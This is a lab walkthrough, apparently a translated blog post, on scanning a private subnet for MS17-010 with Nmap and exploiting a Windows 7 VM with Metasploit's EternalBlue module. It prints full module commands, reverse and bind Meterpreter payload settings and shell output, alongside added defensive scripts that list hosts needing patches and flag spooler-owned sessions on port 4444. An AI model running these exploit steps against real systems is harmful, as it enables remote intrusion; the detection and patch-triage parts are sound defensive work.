Scanning for MS17-010 with Nmap

Use Nmap to probe the 192.168.119.1 /24 (class C) range on the internal network for hosts that have port 445 open and are vulnerable to MS17-010. Since my internal IP is 192.168.119.136, I use this command:
```
root@liuwx:~# nmap -p445 --script smb-vuln-ms17-010 192.168.119.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-10 21:10 CST
Nmap scan report for 192.168.119.1
Host is up (0.00053s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.119.2
Host is up (0.00014s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:50:56:E0:1A:4E (VMware)

Nmap scan report for 192.168.119.139
Host is up (0.00024s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:BF:20:28 (VMware)

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap scan report for 192.168.119.254
Host is up (0.00067s latency).

PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:50:56:EF:68:01 (VMware)

Nmap scan report for 192.168.119.136
Host is up (0.000033s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.46 seconds
```
From the output above we can see that host 192.168.119.139 on the internal network is vulnerable to MS17-010!
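For anyone running this check across a larger range, reading the script output by eye does not scale. The following parser, added here as an example and not part of the original post, turns Nmap's normal-format output into a patch list: it records the state of 445/tcp for each host and picks up the `State:` and CVE lines that the `smb-vuln-ms17-010` script emits. The embedded input is an excerpt of the scan output shown above, so the parser can be run offline against it.

```python
"""Triage helper: pull the hosts that Nmap's smb-vuln-ms17-010 script
flagged as VULNERABLE out of a saved normal-format scan (nmap -oN), so the
list can go straight to whoever owns patching. Added example, not part of
the original post; the input below is an excerpt of the scan shown above."""
import re
from typing import Dict, List

# Excerpt of the post's scan output (MAC lines dropped; they are not needed).
SCAN_OUTPUT = """\
Nmap scan report for 192.168.119.1
Host is up (0.00053s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 192.168.119.2
Host is up (0.00014s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Nmap scan report for 192.168.119.139
Host is up (0.00024s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH

Nmap scan report for 192.168.119.254
Host is up (0.00067s latency).

PORT    STATE    SERVICE
445/tcp filtered microsoft-ds

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.46 seconds
"""

# "Nmap scan report for 10.0.0.1" or "Nmap scan report for name (10.0.0.1)"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?")
PORT_RE = re.compile(r"^(\d+)/tcp\s+(\w+)\s+")
# Script header lines have exactly one space after "|"; nested lines have more.
SCRIPT_RE = re.compile(r"^\| (\S+):\s*$")
STATE_RE = re.compile(r"^\|\s+State:\s+(\w+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d+")


def parse_scan(text: str) -> Dict[str, dict]:
    """Return {ip: {"port445": state, "ms17_010": script state or None, "cves": [...]}}."""
    hosts: Dict[str, dict] = {}
    cur = None        # record for the host currently being read
    script = None     # name of the NSE script whose block we are inside
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            cur = hosts.setdefault(m.group(1), {"port445": None, "ms17_010": None, "cves": []})
            script = None
            continue
        if cur is None:
            continue
        if not line.startswith("|"):
            script = None   # left the script-output block
        m = PORT_RE.match(line)
        if m and m.group(1) == "445":
            cur["port445"] = m.group(2)
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script = m.group(1)
            continue
        if script == "smb-vuln-ms17-010":
            m = STATE_RE.match(line)
            if m:
                cur["ms17_010"] = m.group(1)
            for cve in CVE_RE.findall(line):
                if cve not in cur["cves"]:
                    cur["cves"].append(cve)
    return hosts


def vulnerable_hosts(text: str) -> List[str]:
    """Hosts the script marked VULNERABLE: these need the MS17-010 patch now."""
    return sorted(ip for ip, h in parse_scan(text).items() if h["ms17_010"] == "VULNERABLE")


def smb_exposed_hosts(text: str) -> List[str]:
    """Hosts with 445/tcp open: candidates for disabling SMBv1 and firewalling
    SMB, even where the check came back clean."""
    return sorted(ip for ip, h in parse_scan(text).items() if h["port445"] == "open")


if __name__ == "__main__":
    print("patch now :", vulnerable_hosts(SCAN_OUTPUT))
    print("445 open  :", smb_exposed_hosts(SCAN_OUTPUT))
```

Feed it a file saved with `nmap -oN` and the two lists give you the hosts to patch and the hosts that still expose SMB at all; a host the script reports as clean but with 445 open is still worth a second look, since the check only covers the specific SMBv1 condition it tests for.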
Exploiting MS17-010

Straight to the command:
```
use exploit/windows/smb/ms17_010_eternalblue
```
Set the target IP, then run:
```
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.119.136:4444
[+] 192.168.119.139:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.119.139:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Command shell session 4 opened (192.168.119.136:4444 -> 192.168.119.139:49169) at 2019-10-10 21:14:11 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>
```
EternalBlue exploitation succeeded! But what comes back is only a cmd shell, because the payload msf uses by default is payload/windows/x64/shell/reverse_tcp. We can set a different payload:
```
set payload windows/x64/meterpreter/reverse_tcp
```
Once that is set, run show options to see which parameters need to be set:
```
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.119.139  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.119.136  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
```
Generally you only need to set RHOSTS and RPORT; msf sets the rest for you automatically! Finally, run exploit and see:
```
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.119.136:4444
[+] 192.168.119.139:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.119.139:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.119.139
[*] Meterpreter session 5 opened (192.168.119.136:4444 -> 192.168.119.139:49211) at 2019-10-10 21:24:40 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >
```
As you can see, this time what comes back is a Meterpreter session; as for what it can do, heh, you know~

A bind (forward-connect) payload works too:
```
meterpreter > netstat -ano

Connection list
===============

    Proto  Local address                        Remote address         State        User  Inode  PID/Program name
    -----  -------------                        --------------         -----        ----  -----  ----------------
    tcp    0.0.0.0:135                          0.0.0.0:*              LISTEN       0     0      712/svchost.exe
    tcp    0.0.0.0:445                          0.0.0.0:*              LISTEN       0     0      4/System
    tcp    0.0.0.0:5357                         0.0.0.0:*              LISTEN       0     0      4/System
    tcp    0.0.0.0:49152                        0.0.0.0:*              LISTEN       0     0      396/wininit.exe
    tcp    0.0.0.0:49153                        0.0.0.0:*              LISTEN       0     0      764/svchost.exe
    tcp    0.0.0.0:49154                        0.0.0.0:*              LISTEN       0     0      928/svchost.exe
    tcp    0.0.0.0:49155                        0.0.0.0:*              LISTEN       0     0      496/services.exe
    tcp    0.0.0.0:49156                        0.0.0.0:*              LISTEN       0     0      2028/svchost.exe
    tcp    0.0.0.0:49157                        0.0.0.0:*              LISTEN       0     0      504/lsass.exe
    tcp    192.168.119.139:139                  0.0.0.0:*              LISTEN       0     0      4/System
    tcp    192.168.119.139:4444                 192.168.119.136:45747  ESTABLISHED  0     0      1248/spoolsv.exe
    tcp    192.168.119.139:49159                192.168.119.136:4444   ESTABLISHED  0     0      1248/spoolsv.exe
    tcp    192.168.119.139:49187                118.112.253.1:80       ESTABLISHED  0     0      928/svchost.exe
    tcp    192.168.119.139:49188                63.147.242.144:80      ESTABLISHED  0     0      928/svchost.exe
    tcp    192.168.119.139:49189                51.143.111.81:80       SYN_SENT     0     0      648/wermgr.exe
    tcp6   :::135                               :::*                   LISTEN       0     0      712/svchost.exe
    tcp6   :::445                               :::*                   LISTEN       0     0      4/System
    tcp6   :::5357                              :::*                   LISTEN       0     0      4/System
    tcp6   :::49152                             :::*                   LISTEN       0     0      396/wininit.exe
    tcp6   :::49153                             :::*                   LISTEN       0     0      764/svchost.exe
    tcp6   :::49154                             :::*                   LISTEN       0     0      928/svchost.exe
    tcp6   :::49155                             :::*                   LISTEN       0     0      496/services.exe
    tcp6   :::49156                             :::*                   LISTEN       0     0      2028/svchost.exe
    tcp6   :::49157                             :::*                   LISTEN       0     0      504/lsass.exe
    udp    0.0.0.0:500                          0.0.0.0:*                           0     0      928/svchost.exe
    udp    0.0.0.0:3702                         0.0.0.0:*                           0     0      1576/svchost.exe
    udp    0.0.0.0:3702                         0.0.0.0:*                           0     0      1576/svchost.exe
    udp    0.0.0.0:4500                         0.0.0.0:*                           0     0      928/svchost.exe
    udp    0.0.0.0:5355                         0.0.0.0:*                           0     0      984/svchost.exe
    udp    0.0.0.0:61604                        0.0.0.0:*                           0     0      1576/svchost.exe
    udp    127.0.0.1:1900                       0.0.0.0:*                           0     0      1576/svchost.exe
    udp    127.0.0.1:65412                      0.0.0.0:*                           0     0      1576/svchost.exe
    udp    192.168.119.139:137                  0.0.0.0:*                           0     0      4/System
    udp    192.168.119.139:138                  0.0.0.0:*                           0     0      4/System
    udp    192.168.119.139:1900                 0.0.0.0:*                           0     0      1576/svchost.exe
    udp    192.168.119.139:65411                0.0.0.0:*                           0     0      1576/svchost.exe
    udp6   :::500                               :::*                                0     0      928/svchost.exe
    udp6   :::3702                              :::*                                0     0      1576/svchost.exe
    udp6   :::3702                              :::*                                0     0      1576/svchost.exe
    udp6   :::4500                              :::*                                0     0      928/svchost.exe
    udp6   :::5355                              :::*                                0     0      984/svchost.exe
    udp6   :::61605                             :::*                                0     0      1576/svchost.exe
    udp6   ::1:1900                             :::*                                0     0      1576/svchost.exe
    udp6   ::1:65410                            :::*                                0     0      1576/svchost.exe
    udp6   fe80::f50f:3929:7979:5c54:1900       :::*                                0     0      1576/svchost.exe
    udp6   fe80::f50f:3929:7979:5c54:65409      :::*                                0     0      1576/svchost.exe

meterpreter >
```
Checking the port and listener state shows that 192.168.119.139:4444 is connected with 192.168.119.136:45747, and the process the payload was injected into is spoolsv.exe.
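The netstat listing above is also what a responder on the Windows side would see, and the giveaway is not the port number alone but which process owns the session: the print spooler has no business holding an established TCP session with another workstation. The check below, added here as an example and not part of the original post, parses `netstat -ano`-style output in the column layout shown above and flags established sessions whose owning process is on a per-environment "should never talk to other machines" list, or which use port 4444, the default LPORT seen in the module options. The process list is an assumption to be tuned per host role; the sample lines are an excerpt of the output above.

```python
"""Host-side check over netstat output: flag established TCP sessions owned
by processes that should not be talking to other machines, and sessions
that use Metasploit's default listener port. Added example, not part of the
original post; the sample below is an excerpt of the listing shown above."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

NETSTAT_OUTPUT = """\
Proto  Local address          Remote address         State        User  Inode  PID/Program name
-----  -------------          --------------         -----        ----  -----  ----------------
tcp    0.0.0.0:135            0.0.0.0:*              LISTEN       0     0      712/svchost.exe
tcp    0.0.0.0:445            0.0.0.0:*              LISTEN       0     0      4/System
tcp    192.168.119.139:139    0.0.0.0:*              LISTEN       0     0      4/System
tcp    192.168.119.139:4444   192.168.119.136:45747  ESTABLISHED  0     0      1248/spoolsv.exe
tcp    192.168.119.139:49159  192.168.119.136:4444   ESTABLISHED  0     0      1248/spoolsv.exe
tcp    192.168.119.139:49187  118.112.253.1:80       ESTABLISHED  0     0      928/svchost.exe
tcp    192.168.119.139:49189  51.143.111.81:80       SYN_SENT     0     0      648/wermgr.exe
udp    0.0.0.0:500            0.0.0.0:*                           0     0      928/svchost.exe
"""

# Assumption: processes that, on an ordinary workstation, have no reason to
# hold a TCP session with another machine. Tune per host role (a print
# server will legitimately differ).
UNEXPECTED_NETWORK_OWNERS = {"spoolsv.exe", "wininit.exe", "services.exe", "winlogon.exe"}
# Metasploit's default LPORT, as seen in the module options above.
SUSPICIOUS_PORTS = {4444}


@dataclass
class Conn:
    proto: str
    local: str
    remote: str
    state: str      # empty for UDP, which carries no state column
    pid: int
    program: str


def parse_netstat(text: str) -> List[Conn]:
    """Parse the column layout used above: TCP rows have 7 fields, UDP rows 6."""
    conns: List[Conn] = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or not fields[0].startswith(("tcp", "udp")):
            continue   # header, separator, blank or prompt line
        if fields[0].startswith("tcp") and len(fields) == 7:
            proto, local, remote, state, _user, _inode, owner = fields
        elif fields[0].startswith("udp") and len(fields) == 6:
            proto, local, remote, _user, _inode, owner = fields
            state = ""
        else:
            continue   # unexpected shape; skip rather than misattribute
        pid, _, program = owner.partition("/")
        conns.append(Conn(proto, local, remote, state, int(pid), program))
    return conns


def port_of(addr: str) -> Optional[int]:
    """Port from 'ip:port' (IPv6 included); None for wildcard '*'."""
    port = addr.rsplit(":", 1)[1]
    return int(port) if port.isdigit() else None


def suspicious_connections(text: str) -> List[Tuple[Conn, List[str]]]:
    """Established sessions worth an analyst's attention, with the reasons."""
    findings = []
    for c in parse_netstat(text):
        if c.state != "ESTABLISHED":
            continue
        reasons = []
        if c.program.lower() in UNEXPECTED_NETWORK_OWNERS:
            reasons.append(f"{c.program} (pid {c.pid}) should not own a remote session")
        if port_of(c.local) in SUSPICIOUS_PORTS or port_of(c.remote) in SUSPICIOUS_PORTS:
            reasons.append("session uses default Metasploit port 4444")
        if reasons:
            findings.append((c, reasons))
    return findings


if __name__ == "__main__":
    for conn, why in suspicious_connections(NETSTAT_OUTPUT):
        print(f"{conn.local} <-> {conn.remote}: " + "; ".join(why))
```

On the listing above this reports both spoolsv.exe sessions (the bind session on local port 4444 and the earlier reverse session to 192.168.119.136:4444) and leaves the svchost.exe web traffic alone. The owner rule is the one that survives an attacker choosing a different port; the port rule only catches defaults left in place.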